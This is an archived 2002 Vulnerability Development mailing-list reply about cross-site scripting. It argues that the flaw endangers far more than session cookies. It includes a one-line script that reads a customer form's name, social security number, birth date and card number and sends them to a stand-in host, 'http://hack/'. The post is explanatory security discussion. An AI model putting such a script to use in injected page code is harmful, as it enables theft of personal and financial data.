Vulnerability Development mailing list archives
Re: CSS, CSS & let me give you some more CSS
From: Andre Mariën <andre.marien () ubizen com>
Date: Mon, 04 Feb 2002 11:06:49 +0100
E M wrote:
I think we are getting away from the original topic, CSS and how it effects you. Basically the general agreement is that cookie stealing via embedded code is the most dangerous use for CSS and the most common. This brings me to the point that cookie based authentication is unsafe inherently and as far as I can tell not something that security minded developers would even consider.
To be clear: cookies are keep-alive session IDs, not real authenticators. Their inherent security is similar too uid/pw: replayable, sniffable string, with a more limited life time.
So the jist is that CSS is mainly used to exploit older web app's that use cookie based authentication (Prime example older versions of Yet another Bulletin Board (Yabb). Not to say it can't be used for other things, just that from what I'm seeing... its not.
Suppose someone runs this script: w = open('form.htm','form.htm'); url='http://hack/'+encode(w.f.name+w.f.ssn+w.f.birth+w.f.cc); where form is a customer detail page update form from the site under attack. The url that is produced picks up very nice information (social security number, credit card; whatever nice stuff is there) It does not matter how you secured the site, as long as it does not require human intervention anymore (!) at the time of attack. To spell it out: cookies, basic authentication, SSL3: who cares? Regardless of the fact that one does not see how things can be abused, the mere fact that someone can do things he shouldn't have been able to do, should be enough to protect against it.
Current thread:
- Re: CSS, CSS & let me give you some more CSS, (continued)
- Re: CSS, CSS & let me give you some more CSS Bill Pennington (Feb 01)
- Re: CSS, CSS & let me give you some more CSS E M (Feb 01)
- Re: CSS, CSS & let me give you some more CSS Sverre H. Huseby (Feb 01)
- New thoughts on CSS Brett Moore (Feb 01)
- RE: New thoughts on CSS Matt Dickinson (Feb 01)
- RE: New thoughts on CSS jon schatz (Feb 01)
- Re: New thoughts on CSS Blue Boar (Feb 01)
- Re: New thoughts on CSS Jonas M Luster (Feb 03)
- RE: New thoughts on CSS other (Feb 02)
- Re: CSS, CSS & let me give you some more CSS Blake Frantz (Feb 01)
- Re: CSS, CSS & let me give you some more CSS Andre Mariën (Feb 04)
- RE: CSS, CSS & let me give you some more CSS Brian McWilliams (Feb 01)
- RE: CSS, CSS & let me give you some more CSS Marc Slemko (Feb 01)
- RE: CSS, CSS & let me give you some more CSS - phinegeek - (Feb 02)